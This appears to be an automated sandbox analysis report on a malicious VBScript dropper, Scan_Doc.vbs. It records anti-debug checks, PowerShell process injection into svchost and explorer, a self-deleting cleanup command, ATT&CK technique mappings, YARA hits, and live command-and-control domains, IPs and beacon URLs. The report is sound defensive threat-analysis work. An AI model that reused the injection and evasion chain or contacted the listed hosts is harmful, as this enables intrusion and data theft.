          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455AA16 mov eax, dword ptr fs:[00000030h]7_2_0455AA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455AA16 mov eax, dword ptr fs:[00000030h]7_2_0455AA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A61C mov eax, dword ptr fs:[00000030h]7_2_0458A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A61C mov eax, dword ptr fs:[00000030h]7_2_0458A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov eax, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov ecx, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov eax, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04555210 mov eax, dword ptr fs:[00000030h]7_2_04555210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04573A1C mov eax, dword ptr fs:[00000030h]7_2_04573A1C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C600 mov eax, dword ptr fs:[00000030h]7_2_0455C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C600 mov eax, dword ptr fs:[00000030h]7_2_0455C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C600 mov eax, dword ptr fs:[00000030h]7_2_0455C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04588E00 mov eax, dword ptr fs:[00000030h]7_2_04588E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04568A0A mov eax, dword ptr fs:[00000030h]7_2_04568A0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460FE3F mov eax, dword ptr fs:[00000030h]7_2_0460FE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611608 mov eax, dword ptr fs:[00000030h]7_2_04611608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455E620 mov eax, dword ptr fs:[00000030h]7_2_0455E620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04594A2C mov eax, dword ptr fs:[00000030h]7_2_04594A2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04594A2C mov eax, dword ptr fs:[00000030h]7_2_04594A2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582ACB mov eax, dword ptr fs:[00000030h]7_2_04582ACB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045836CC mov eax, dword ptr fs:[00000030h]7_2_045836CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04598EC7 mov eax, dword ptr fs:[00000030h]7_2_04598EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0460FEC0 mov eax, dword ptr fs:[00000030h]7_2_0460FEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628ED6 mov eax, dword ptr fs:[00000030h]7_2_04628ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045676E2 mov eax, dword ptr fs:[00000030h]7_2_045676E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045816E0 mov ecx, dword ptr fs:[00000030h]7_2_045816E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04582AE4 mov eax, dword ptr fs:[00000030h]7_2_04582AE4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04620EA5 mov eax, dword ptr fs:[00000030h]7_2_04620EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04620EA5 mov eax, dword ptr fs:[00000030h]7_2_04620EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04620EA5 mov eax, dword ptr fs:[00000030h]7_2_04620EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458D294 mov eax, dword ptr fs:[00000030h]7_2_0458D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458D294 mov eax, dword ptr fs:[00000030h]7_2_0458D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EFE87 mov eax, dword ptr fs:[00000030h]7_2_045EFE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456AAB0 mov eax, dword ptr fs:[00000030h]7_2_0456AAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456AAB0 mov eax, dword ptr fs:[00000030h]7_2_0456AAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458FAB0 mov eax, dword ptr fs:[00000030h]7_2_0458FAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045552A5 mov eax, dword ptr fs:[00000030h]7_2_045552A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D46A7 mov eax, dword ptr fs:[00000030h]7_2_045D46A7
          Source: C:\Windows\SysWOW64\svchost.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe, Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe, Code function: 3_2_0040ACE0 LdrLoadDll

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 185.53.179.91 80
          Source: C:\Windows\explorer.exe Network Connect: 76.223.105.230 80
          Source: C:\Windows\explorer.exe Network Connect: 99.83.196.71 80
          Source: C:\Windows\explorer.exe Domain query: www.baroevent.com
          Source: C:\Windows\explorer.exe Domain query: www.apinspect.net
          Source: C:\Windows\explorer.exe Network Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exe Network Connect: 209.142.66.216 80
          Source: C:\Windows\explorer.exe Domain query: www.electorhome.com
          Source: C:\Windows\explorer.exe Domain query: www.krmq9w.cfd
          Source: C:\Windows\explorer.exe Domain query: www.qsmdrkjw.cfd
          Source: C:\Windows\explorer.exe Domain query: www.rixiojjl.cfd
          Source: C:\Windows\explorer.exe Domain query: www.lajzznhk.cfd
          Source: C:\Windows\explorer.exe Domain query: www.hyperpigmentation-91528.bond
          Source: C:\Windows\SysWOW64\svchost.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: DD0000
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EA9008
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\svchost.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3452
          Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3452
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('[Base64 payload removed] ...
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.901713515.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.910398118.00000000090D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.405024865.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.901713515.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.901159197.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.394591990.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.395001710.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.901713515.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.434609421.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901104255.0000000000610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.434731548.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.396459578.00000210A1804000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.901186308.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 11 Command and Scripting Interpreter | Path Interception | 712 Process Injection | 1 Rootkit | 1 Credential API Hooking | 121 Security Software Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | 221 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 31 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 4 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | 1 Shared Modules | Logon Script (Windows) | Logon Script (Windows) | 712 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | 2 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 221 Scripting | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Software Packing | DCSync | 112 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph: ID: 1272266, Sample: Scan_Doc.vbs, Startdate: 13/07/2023, Architecture: WINDOWS, Score: 100
          Process chain: wscript.exe -> powershell.exe -> svchost.exe (and conhost.exe) -> explorer.exe (injected) -> cmmon32.exe -> cmd.exe -> conhost.exe

          Source | Detection | Scanner | Label | Link
          Scan_Doc.vbs | 11% | ReversingLabs | Script-WScript.Trojan.Heuristic |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          baroevent.com | 99.83.196.71 | true | true | | unknown
          www.qsmdrkjw.cfd | 150.95.255.38 | true | true | | unknown
          electorhome.com | 209.142.66.216 | true | true | | unknown
          www.lajzznhk.cfd | 150.95.255.38 | true | true | | unknown
          apinspect.net | 76.223.105.230 | true | true | | unknown
          freswe.click | 188.166.220.201 | true | false | | unknown
          www.hyperpigmentation-91528.bond | 185.53.179.91 | true | true | | unknown
          www.electorhome.com | unknown | unknown | true | | unknown
          www.krmq9w.cfd | unknown | unknown | true | | unknown
          www.rixiojjl.cfd | unknown | unknown | true | | unknown
          www.baroevent.com | unknown | unknown | true | | unknown
          www.apinspect.net | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://www.baroevent.com/g94s/?DrKTC2=LjGd&e8a=GuZ41zQWOd+87sgZ9z9r0yJ0b7/bNTnEQt2o5soiWmDSZcifYwExlLr0dWNcGWkaVVoe | true | Avira URL Cloud: safe | unknown
          http://www.qsmdrkjw.cfd/g94s/?e8a=4rsHG0K5vlabiiLb0b+gqyCvQQblgz1hCMRkDjqQQizxtgmj5/lVmT/rQgDGf/7aGVqR&DrKTC2=LjGd | true | Avira URL Cloud: safe | unknown
          http://www.hyperpigmentation-91528.bond/g94s/?DrKTC2=LjGd&e8a=tzSFV3H7hErTYvWZwPPC/GAyGN0rrg2x5F2fwYgRRUbDdRuSW2XehEr5Lw08uOFm07l+ | true | Avira URL Cloud: safe | unknown
          www.krmq9w.cfd/g94s/ | true | Avira URL Cloud: safe | low
          http://freswe.click/v/sino.txt | false | Avira URL Cloud: safe | unknown
          http://www.lajzznhk.cfd/g94s/?DrKTC2=LjGd&e8a=5qGn5zDRUH6BiPO85kMHocR4ZABcZylpPNAkuw/9HE6KA+R+11lsVjOMN8VjI6ygwzFy | true | Avira URL Cloud: safe | unknown
          http://www.apinspect.net/g94s/?e8a=SOSNSp6179aTy13qq7TcaAlSRULweXb3E3crC3cjWejL5clntEZHzdPIzB6indnn7XUZ&DrKTC2=LjGd | true | Avira URL Cloud: safe | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
                                  unknown
                                  http://www.hyperpigmentation-91528.bondexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.yprblqkk.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.qsmdrkjw.cfd/g94s/www.lajzznhk.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.krmq9w.cfdReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.styledinfaith.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.baroevent.com/g94s/www.brezop.xyzexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.lajzznhk.cfd/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.hyperpigmentation-91528.bond/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.latamgradoenenfermeria.com/g94s/www.styledinfaith.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.rixiojjl.cfd/g94s/www.krmq9w.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.brezop.xyzReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.latamgradoenenfermeria.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.justinwdong.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.xnmshx.cfd/g94s/www.93txm.liveexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.hyperpigmentation-91528.bond/g94s/www.rixiojjl.cfdexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.lojq5vh.buzz/g94s/www.justinwdong.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.electorhome.comexplorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.justinwdong.comReferer:explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.392901894.00000210915F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.electorhome.com/g94s/explorer.exe, 00000004.00000003.571754857.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.549553442.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.807573233.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.911847170.000000000F31B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.670122595.000000000F31B000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
